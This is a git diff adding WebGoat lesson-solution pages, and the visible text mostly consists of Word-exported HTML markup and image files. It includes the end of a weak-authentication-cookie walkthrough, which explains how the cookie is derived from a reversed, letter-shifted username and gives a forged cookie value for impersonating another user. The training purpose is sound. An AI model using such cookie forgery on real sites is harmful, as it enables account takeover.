+  solid windowtext .5pt;padding:0cm 5.4pt 0cm 5.4pt;height:20.25pt'>
+  <p class=MsoNormal style='line-height:115%'><span style='font-family:"Arial","sans-serif"'>ubphcfx<o:p></o:p></span></p>
+  </td>
+ </tr>
+ <tr style='mso-yfti-irow:1;mso-yfti-lastrow:yes;height:24.0pt'>
+  <td width=216 valign=top style='width:162.0pt;border:solid windowtext 1.0pt;
+  border-top:none;mso-border-top-alt:solid windowtext .5pt;mso-border-alt:solid windowtext .5pt;
+  padding:0cm 5.4pt 0cm 5.4pt;height:24.0pt'>
+  <p class=MsoNormal style='line-height:115%'><span style='font-family:"Arial","sans-serif"'>Aspect<o:p></o:p></span></p>
+  </td>
+  <td width=259 valign=top style='width:194.25pt;border-top:none;border-left:
+  none;border-bottom:solid windowtext 1.0pt;border-right:solid windowtext 1.0pt;
+  mso-border-top-alt:solid windowtext .5pt;mso-border-left-alt:solid windowtext .5pt;
+  mso-border-alt:solid windowtext .5pt;padding:0cm 5.4pt 0cm 5.4pt;height:24.0pt'>
+  <p class=MsoNormal style='line-height:115%'><span style='font-family:"Arial","sans-serif"'>udfgfb<o:p></o:p></span></p>
+  </td>
+ </tr>
+</table>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This is an transposition
+of the letters of the alphabet. Each letter is replaced with its successor, for
+example t-&gt;u, a-&gt;b and the user name is reversed. So for user name <st1:place
+w:st="on"><st1:City w:st="on">alice</st1:City></st1:place> the cookie will
+contain the reversed user name ecila and the successors of the letters. This
+results in fdjmb.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Login with
+user name <st1:place w:st="on"><st1:City w:st="on">alice</st1:City></st1:place>
+and intercept the request in WebScarab. Add AuthCookie=65432fdjmb to the
+existing cookie JSESSIONID.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_603"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:459.75pt;height:362.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image015.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=613 height=483
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg" v:shapes="Picture_x0020_603"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>7</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Add AuthCookie to request<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_604"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image017.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg" v:shapes="Picture_x0020_604"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>8</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lesson 11 Completed<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml
new file mode 100644
index 000000000..ce42de1c0
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/filelist.xml
@@ -0,0 +1,24 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../WeakAuthenticationCookie.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image019.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image020.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image021.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image022.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image023.jpg"/>
+ <o:File HRef="image011.png"/>
+ <o:File HRef="image024.jpg"/>
+ <o:File HRef="image013.png"/>
+ <o:File HRef="image025.jpg"/>
+ <o:File HRef="image015.png"/>
+ <o:File HRef="image026.jpg"/>
+ <o:File HRef="image017.png"/>
+ <o:File HRef="image027.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image001.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image001.png
new file mode 100644
index 000000000..edac8c19a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image003.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image003.png
new file mode 100644
index 000000000..0306a8f1f
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image005.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image005.png
new file mode 100644
index 000000000..7afb889fe
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image007.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image007.png
new file mode 100644
index 000000000..5c6c3d9c8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image009.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image009.png
new file mode 100644
index 000000000..6d110d265
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image011.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image011.png
new file mode 100644
index 000000000..6831d62bf
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image011.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image013.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image013.png
new file mode 100644
index 000000000..c04235add
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image013.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image015.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image015.png
new file mode 100644
index 000000000..b0a6eceb4
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image015.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image017.png b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image017.png
new file mode 100644
index 000000000..78a1feb74
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image017.png differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg
new file mode 100644
index 000000000..a6e68a265
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image019.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg
new file mode 100644
index 000000000..338a42ed8
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image020.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg
new file mode 100644
index 000000000..c1662c8f0
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image021.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg
new file mode 100644
index 000000000..96f7253fd
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image022.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg
new file mode 100644
index 000000000..c856ee032
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image023.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg
new file mode 100644
index 000000000..1cbf8ff3a
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image024.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg
new file mode 100644
index 000000000..d9b59af8b
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image025.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg
new file mode 100644
index 000000000..5d30443e1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image026.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg
new file mode 100644
index 000000000..dec137dce
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/image027.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/WeakAuthenticationCookie_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID.html b/main/project/WebContent/lesson_solutions/WeakSessionID.html
new file mode 100644
index 000000000..32e11cc15
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WeakSessionID.html
@@ -0,0 +1,895 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/WeakSessionID_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/WeakSessionID_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>27</o:TotalTime>
+  <o:Created>2007-07-11T10:54:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:30:00Z</o:LastSaved>
+  <o:Pages>3</o:Pages>
+  <o:Words>469</o:Words>
+  <o:Characters>2677</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>22</o:Lines>
+  <o:Paragraphs>6</o:Paragraphs>
+  <o:CharactersWithSpaces>3140</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/WeakSessionID_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/WeakSessionID_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
